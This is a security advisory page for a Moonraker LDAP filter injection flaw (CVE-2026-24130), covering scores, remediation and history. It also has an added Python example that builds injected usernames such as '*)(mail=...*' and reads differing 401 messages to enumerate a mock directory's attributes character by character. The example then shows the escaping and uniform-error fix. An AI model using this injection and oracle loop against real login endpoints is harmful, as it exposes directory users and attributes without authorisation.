Description
Moonraker is a Python web server providing API access to Klipper 3D printing firmware. In versions 0.9.3 and below, instances configured with the "ldap" component enabled are vulnerable to LDAP search filter injection techniques via the login endpoint. The 401 error response message can be used to determine whether or not a search was successful, allowing for brute force methods to discover LDAP entries on the server such as user IDs and user attributes. This issue has been fixed in version 0.10.0.
Published: 2026-01-22
Score: 2.7 Low
EPSS: < 1% Very Low
KEV: No
Impact: Information disclosure via LDAP search filter injection
Action: Upgrade
AI Analysis

Impact

Moonraker, a Python web server that provides API access for Klipper 3D printing firmware, builds an LDAP search filter from the username submitted to its login endpoint when the ldap component is enabled. Because filter metacharacters in that username are not escaped (CWE-90), an attacker can close the intended clause and append filter clauses of their own. The 401 error message then differs depending on whether the search matched an entry (CWE-209), which gives an unauthenticated attacker a yes/no oracle for brute-forcing LDAP entries such as user IDs and attribute values. This does not grant code execution, but it compromises the confidentiality of directory data.

Affected Systems

Affected systems are Arksine Moonraker releases 0.9.3 and earlier running with the ldap component enabled; instances without LDAP configured are not exposed. Administrators of these versions should check their configuration to confirm whether LDAP integration is actually required.

Risk and Exploitability

The CVSS v4.0 base score of 2.7 reflects a low, confidentiality-only impact (VC:L) with exploit maturity recorded as unreported (E:U); NVD's CVSS v3.1 assessment of the same issue is 5.3 (C:L). The EPSS score below 1% indicates a very low predicted likelihood of exploitation, and the vulnerability is not in CISA's KEV catalog, which means there is no evidence of exploitation in the wild, not that exploitation is infeasible. The attack vector is network reachability of the login endpoint with no prior authentication (PR:N) and no user interaction (UI:N): the attacker submits usernames containing LDAP filter metacharacters and reads the 401 message to learn whether the injected clause matched. The flaw yields no code execution or privilege change; its effect is limited to enumeration of directory entries and attribute values. Mitigation is to upgrade to 0.10.0 or to disable the ldap component.
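An added example, not Moonraker's own code, illustrating the mechanism described in the Impact and the Risk and Exploitability paragraphs above: the unescaped filter construction, the RFC 4515 escaping that fixes it, and how two distinct 401 messages become a character-by-character oracle. The directory entries, passwords, filter template, error strings and the assumption that the endpoint binds as the first matching entry are all constructed for this illustration and are not taken from the advisory or from Moonraker.

```python
"""Added example, not Moonraker's code: unescaped filter construction (CWE-90)
beside RFC 4515 escaping, a toy in-memory LDAP filter evaluator, and a mock
login endpoint whose two 401 messages form the search-result oracle (CWE-209)
that CVE-2026-24130 describes. Directory entries, passwords, filter template,
error strings and the bind-as-first-hit behaviour are all constructed
assumptions for this illustration, not values from the advisory."""
import re

# RFC 4515 section 3: characters that must be hex-escaped inside a value.
_ESCAPE = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}

def escape_filter_chars(value: str) -> str:
    """Turn user input into a literal assertion value instead of filter syntax."""
    return "".join(_ESCAPE.get(ch, ch) for ch in value)

def build_filter_vulnerable(username: str) -> str:
    """Raw interpolation: '*', '(' and ')' in username restructure the filter."""
    return f"(&(objectClass=person)(uid={username}))"

def build_filter_safe(username: str) -> str:
    """Same template with the value escaped: input can only match a uid."""
    return f"(&(objectClass=person)(uid={escape_filter_chars(username)}))"

# Toy directory (constructed) and evaluator for the RFC 4515 subset &, |, =, *.
DIRECTORY = [
    {"objectclass": ["person"], "uid": ["alice"], "mail": ["alice@example.test"]},
    {"objectclass": ["person"], "uid": ["bob"], "mail": ["bob@example.test"]},
]
PASSWORDS = {"alice": "correct horse", "bob": "hunter2"}  # constructed

def _unescape(value: str) -> str:
    return re.sub(r"\\([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), value)

def _parse(s: str, i: int):
    """Parse one parenthesised filter starting at s[i]; return (node, next index)."""
    if s[i] != "(":
        raise ValueError("expected '('")
    i += 1
    if s[i] in "&|":
        op, kids, i = s[i], [], i + 1
        while s[i] == "(":
            node, i = _parse(s, i)
            kids.append(node)
        if s[i] != ")":
            raise ValueError("expected ')'")
        return (op, kids), i + 1
    j = s.index(")", i)  # an escaped ')' is '\29', so the first ')' ends the clause
    attr, pattern = s[i:j].split("=", 1)
    return ("=", attr.lower(), pattern), j + 1

def _match(node, entry) -> bool:
    if node[0] in ("&", "|"):
        return (all if node[0] == "&" else any)(_match(k, entry) for k in node[1])
    _, attr, pattern = node
    # Unescaped '*' is a wildcard; '\2a' becomes a literal '*' after unescaping.
    parts = [re.escape(_unescape(p)) for p in pattern.split("*")]
    rx = re.compile("^" + ".*".join(parts) + "$", re.IGNORECASE)
    return any(rx.match(v) for v in entry.get(attr, []))

def search(filter_str: str) -> list:
    """Return matching entries; a malformed filter is treated as no match."""
    try:
        node, end = _parse(filter_str, 0)
        if end != len(filter_str):
            raise ValueError("trailing data")
    except (IndexError, ValueError):
        return []
    return [e for e in DIRECTORY if _match(node, e)]

def login(username: str, password: str, build_filter, uniform_errors=False):
    """Mock login endpoint returning (status, message). With uniform_errors=False
    the 401 text reveals whether the search matched, which is the oracle."""
    entries = search(build_filter(username))
    if not entries:
        return 401, "invalid username or password" if uniform_errors else "user not found"
    uid = entries[0]["uid"][0]  # bind as the first hit (constructed behaviour)
    if PASSWORDS.get(uid) != password:
        return 401, "invalid username or password" if uniform_errors else "invalid password"
    return 200, "ok"

def enumerate_mail_prefix(build_filter, uniform_errors=False, max_len=8) -> str:
    """Recover the start of some person's mail attribute one character per round,
    using only the 401 message. Returns '' when the oracle is closed."""
    prefix = ""
    while len(prefix) < max_len:
        for ch in "abcdefghijklmnopqrstuvwxyz@.":
            # Closes the uid clause and adds a second AND term, so the vulnerable
            # builder yields (&(objectClass=person)(uid=*)(mail=<prefix><ch>*)).
            payload = f"*)(mail={prefix}{ch}*"
            if login(payload, "x", build_filter, uniform_errors)[1] == "invalid password":
                prefix += ch
                break
        else:
            break
    return prefix
```

Calling `enumerate_mail_prefix(build_filter_vulnerable)` recovers the first eight characters of a mail attribute with no valid credentials, at the cost of one 401 response per guess. Escaping the value (`build_filter_safe`) stops the clause injection on its own; returning the same message for both failure modes (`uniform_errors=True`) closes the oracle even if another injection point were found. A fixed deployment should do both.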

Generated by OpenCVE AI on April 18, 2026 at 03:30 UTC.

Remediation

Vendor fix: upgrade to Moonraker 0.10.0, in which the issue is fixed (see GHSA-3jqf-v4mv-747g). Workaround until the upgrade is applied: disable the ldap component.

OpenCVE Recommended Actions

  • Apply the official patch by upgrading to Moonraker 0.10.0 or later
  • If LDAP authentication is not needed, remove the ldap component from the Moonraker configuration; the login endpoint then no longer builds an LDAP search filter from the submitted username, which removes the injection point
  • Implement network segmentation or firewall rules to restrict access to the login endpoint as a temporary countermeasure

Advisories

  Source: GitHub GHSA
  ID: GHSA-3jqf-v4mv-747g
  Title: Moonraker affected by LDAP search filter injection

History

Fri, 27 Feb 2026 14:00:00 +0000

  Values added:
    CPEs: cpe:2.3:a:arksine:moonraker:*:*:*:*:*:python:*:*
    Metrics (cvssV3_1): {'score': 5.3, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}

Fri, 23 Jan 2026 20:15:00 +0000

  Values added:
    Metrics (ssvc): {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Fri, 23 Jan 2026 16:45:00 +0000

  Values added:
    First Time appeared: Arksine; Arksine moonraker
    Vendors & Products: Arksine; Arksine moonraker

Thu, 22 Jan 2026 23:00:00 +0000

  Values added:
    Description: Moonraker is a Python web server providing API access to Klipper 3D printing firmware. In versions 0.9.3 and below, instances configured with the "ldap" component enabled are vulnerable to LDAP search filter injection techniques via the login endpoint. The 401 error response message can be used to determine whether or not a search was successful, allowing for brute force methods to discover LDAP entries on the server such as user IDs and user attributes. This issue has been fixed in version 0.10.0.
    Title: Moonraker with LDAP Enabled Allows Malicious Search Filter Injection
    Weaknesses: CWE-209, CWE-90
    References:
    Metrics (cvssV4_0): {'score': 2.7, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U'}


MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-01-23T20:03:49.510Z

Reserved: 2026-01-21T18:38:22.474Z

Link: CVE-2026-24130

Vulnrichment

Updated: 2026-01-23T20:03:45.816Z

NVD

Status : Analyzed

Published: 2026-01-22T23:15:58.477

Modified: 2026-02-27T13:57:16.400

Link: CVE-2026-24130

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-18T03:30:25Z

Weaknesses